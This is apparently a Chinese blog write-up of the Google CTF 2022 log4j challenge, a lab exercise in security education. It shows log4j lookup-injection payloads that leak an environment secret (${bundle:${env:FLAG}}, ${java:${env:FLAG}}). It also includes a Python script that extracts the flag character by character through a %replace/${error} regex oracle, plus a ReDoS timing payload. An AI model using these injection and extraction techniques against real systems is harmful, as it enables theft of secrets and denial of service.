GoogleCTF log4j

CyanM0un 发布于

前置知识

  • -Dcmd:

Java 运行时

1
java -Dkey=value

就会产生一个 key = value 的系统属性

等同于这样一段代码

1
System.setProperty("key", "value");

IDEA中运行如何配置呢?加 jvm 参数即可

image-20220731164954562

  • Log4j 的 lookup:将${}中内容替换,如 sys,env,bundle,java
  • 配置文件
1
2
3
4
5
6
7
8
9
10
11
12
13
<Configuration status="INFO">
    <Appenders>
        <Console name="Console" target="SYSTEM_ERR">
            <PatternLayout pattern="%d{HH:mm:ss.SSS} %-5level %logger{36} executing ${sys:cmd} - %msg %n">
            </PatternLayout>
        </Console>
    </Appenders>
    <Loggers>
        <Root level="debug">
            <AppenderRef ref="Console"/>
        </Root>
    </Loggers>
</Configuration>

如果没有指定 logger ,则默认使用该 Root 输出,且为 stderr 的

Exploit

python 代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
app = Flask(__name__)

@app.route("/", methods=['GET', 'POST'])
def start():
    if request.method == 'POST':
        text = request.form['text'].split(' ')
        cmd = ''
        if len(text) < 1:
            return ('invalid message', 400)
        elif len(text) < 2:
            cmd = text[0]
            text = ''
        else:
            cmd, text = text[0], ' '.join(text[1:])
        result = chat(cmd, text)
        return result
    return render_template('index.html')

def chat(cmd, text):
    # run java jar with a 10 second timeout
    res = subprocess.run(['java', '-jar', '-Dcmd=' + cmd, 'chatbot/target/app-1.0-SNAPSHOT.jar', '--', text], capture_output=True, timeout=10)
    print(res.stderr.decode('utf8'))
    return res.stdout.decode('utf-8')

if __name__ == '__main__':
    port = os.environ['PORT'] if 'port' in os.environ else 1337
    app.run(host='0.0.0.0', port=port)

可以看到只会输出标准输出的结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import java.lang.System;
import java.time.format.DateTimeFormatter;
import java.time.LocalDateTime;

public class App {
  public static Logger LOGGER = LogManager.getLogger(App.class);
  public static void main(String[]args) {
    String flag = System.getenv("FLAG");
    if (flag == null || !flag.startsWith("CTF")) {
        LOGGER.error("{}", "Contact admin");
    }
		//日志输出命令行参数
    LOGGER.info("msg: {}", args);
    // TODO: implement bot commands
    String cmd = System.getProperty("cmd");
    if (cmd.equals("help")) {
      doHelp();
      return;
    }
    if (!cmd.startsWith("/")) {
      System.out.println("The command should start with a /.");
      return;
    }
    doCommand(cmd.substring(1), args);
  }

  private static void doCommand(String cmd, String[] args) {
    switch(cmd) {
      case "help":
        doHelp();
        break;
      case "repeat":
        System.out.println(args[1]);
        break;
      case "time":
        DateTimeFormatter dtf = DateTimeFormatter.ofPattern("yyyy/M/d H:m:s");
        System.out.println(dtf.format(LocalDateTime.now()));
        break;
      case "wc":
        if (args[1].isEmpty()) {
          System.out.println(0);
        } else {
          System.out.println(args[1].split(" ").length);
        }
        break;
      default:
        System.out.println("Sorry, you must be a premium member in order to run this command.");
    }
  }
  private static void doHelp() {
    System.out.println("Try some of our free commands below! \nwc\ntime\nrepeat");
  }
}

log4j 是 2.17.2 的,不存在 JDNI 注入

通过异常带出

在 xml 配置文件中

1
%d{HH:mm:ss.SSS} %-5level %logger{36} executing ${sys:cmd} - %msg %n

如果 cmd=${env:FLAG}

image-20220731171043105

但并不会返回到前端,因为不是在标准输出中,所以就可以尝试用其他的 logger

bundle

1
${bundle:${env:FLAG}}

image-20220731171837317

image-20220731171855688

java

1
${java:${env:FLAG}}

image-20220731172113700

image-20220731172202292

image-20220731172221978

通过条件表达式猜测

新题中:

image-20220731175207352

可能是将 flag 和一些异常输出特征给禁止了

image-20220731175314746

image-20220731175336065

我们需要判别 flag 是否为 CTF{t*,虽然 log4j 中没有做 “string contains” 或 “string start with” 的 lookup,但是有个正则替换:

1
%replace{abc}{a}{d}=>dbc

所以就可以构造:

image-20220731175447659

说明我们 cmd 为 flag

image-20220731175505156

${error}简单理解就是使用了就会抛出一个 exception,或者这样也可以

image-20220731180920370

因此可以通过脚本探测 flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import requests

def int2hex(num):
    # transforms 65 to '\x41'
    return f"\\x{num:02x}"

def str2hex(text):
    # transforms 'hello' to '\x68\x65\x6c\x6c\x6f'
    return "".join(map(int2hex, map(ord, text)))

def get_regex(prefix, lo, hi):
    check = "[" + int2hex(lo) + "-" + int2hex(hi) + "]"
    return "%replace{${env:FLAG}}{^" + str2hex(prefix) + check + "}{${error}}"

def test_pattern(pattern, endpoint):
    # triggers an exception if the regex pattern matches
    response = requests.post(endpoint, data=dict(text=pattern))
    return "ERROR" in response.text or "Censored" in response.text

def binary_search(prefix, lo, hi, test_range):
    # binary search with minimum number of comparisons
    while lo != hi:
        mid = (lo + hi) // 2
        if test_range(prefix, lo, mid):
            hi = mid
        else:
            lo = mid + 1

    if test_range(prefix, lo, lo):
        return lo
    return None

def solve(endpoint):
    def test_range(prefix, lo, hi):
        print(f" => {prefix} [{chr(lo)}-{chr(hi)}]", end="\r")
        pattern = get_regex(prefix, lo, hi)
        return test_pattern(pattern, endpoint)

    flag = "CTF"
    while True:
        # search the all printable ascii characters
        match = binary_search(flag, 0x20, 0x7E, test_range)
        if not match:
            return
        flag += chr(match)


solve("https://log4j2-web.2022.ctfcompetition.com/")
# CTF{and-you-thought-it-was-over-didnt-you}

redos

不仅可以通过输出,还可以通过响应时间来判断

1
2
3
def chat(cmd, text):
    # run java jar with a 10 second timeout
    res = subprocess.run(['...'], capture_output=True, timeout=10)

如这样的代码

1
%replace{hchcchicihcchciiicichhcichcihcchiihichiciiiihhcchicchhcihchcihiihciichhccciccichcichiihcchcihhicchcciicchcccihiiihhihihihichicihhcciccchihhhcchichchciihiicihciihcccciciccicciiiiiiiiicihhhiiiihchccchchhhhiiihchihcccchhhiiiiiiiicicichicihcciciihichhhhchihciiihhiccccccciciihhichiccchhicchicihihccichicciihcichccihhiciccccccccichhhhihihhcchchihihiihhihihihicichihiiiihhhhihhhchhichiicihhiiiiihchccccchichci}{(h|h|ih(((i|a|c|c|a|i|i|j|b|a|i|b|a|a|j))+h)ahbfhba|c|i)*}{match}

image-20220801085327268

所以 payload 如下

1
%replace{${env:FLAG}.hchcchicihcchciiicichhcichcihcchiihichiciiiihhcchicchhcihchcihiihciichhccciccichcichiihcchcihhicchcciicchcccihiiihhihihihichicihhcciccchihhhcchichchciihiicihciihcccciciccicciiiiiiiiicihhhiiiihchccchchhhhiiihchihcccchhhiiiiiiiicicichicihcciciihichhhhchihciiihhiccccccciciihhichiccchhicchicihihccichicciihcichccihhiciccccccccichhhhihihhcchchihihiihhihihihicichihiiiihhhhihhhchhichiicihhiiiiihchccccchichci}{(CTF[a-z].*|(h|h|ih(((i|a|c|c|a|i|i|j|b|a|i|b|a|a|j))+h)ahbfhba|c|i)*)}{match}

如果 flag 是 CTF[a-z] 就会匹配第一种,否则就会 timeout

另记一点

如何扫描并获取包下被指定注解的类

1
2
3
4
5
6
7
8
9
10
11
<dependency>
  <groupId>org.reflections</groupId>
  <artifactId>reflections</artifactId>
  <version>0.9.11</version>
</dependency>

<dependency>
  <groupId>com.google.guava</groupId>
  <artifactId>guava</artifactId>
  <version>21.0</version>
</dependency>
1
2
3
4
5
6
7
8
9
Reflections f = new Reflections("org.apache.logging.log4j.core");
Set<Class<?>> set = f.getTypesAnnotatedWith(ConverterKeys.class);
for (Class<?> tmp:set){
  if (tmp.isInterface()){
    System.out.println("interface:"+tmp.getName());
  }else {
    System.out.println("class:"+tmp.getName());
  }
}

参考

https://y4tacker.github.io/2022/07/06/year/2022/7/GoogleCTF2022-Log4j/

https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/

CyanM0un

CyanM0un

青山见我应如是

13
4
0
TOC
  1. 1. 前置知识
  2. 2. Exploit
    1. 2.1. 通过异常带出
    2. 2.2. 通过条件表达式猜测
    3. 2.3. redos
    4. 2.4. 另记一点
  3. 3. 参考
NOTICE

读书切戒在慌忙,涵泳工夫兴味长

CATEGORYS
TAGS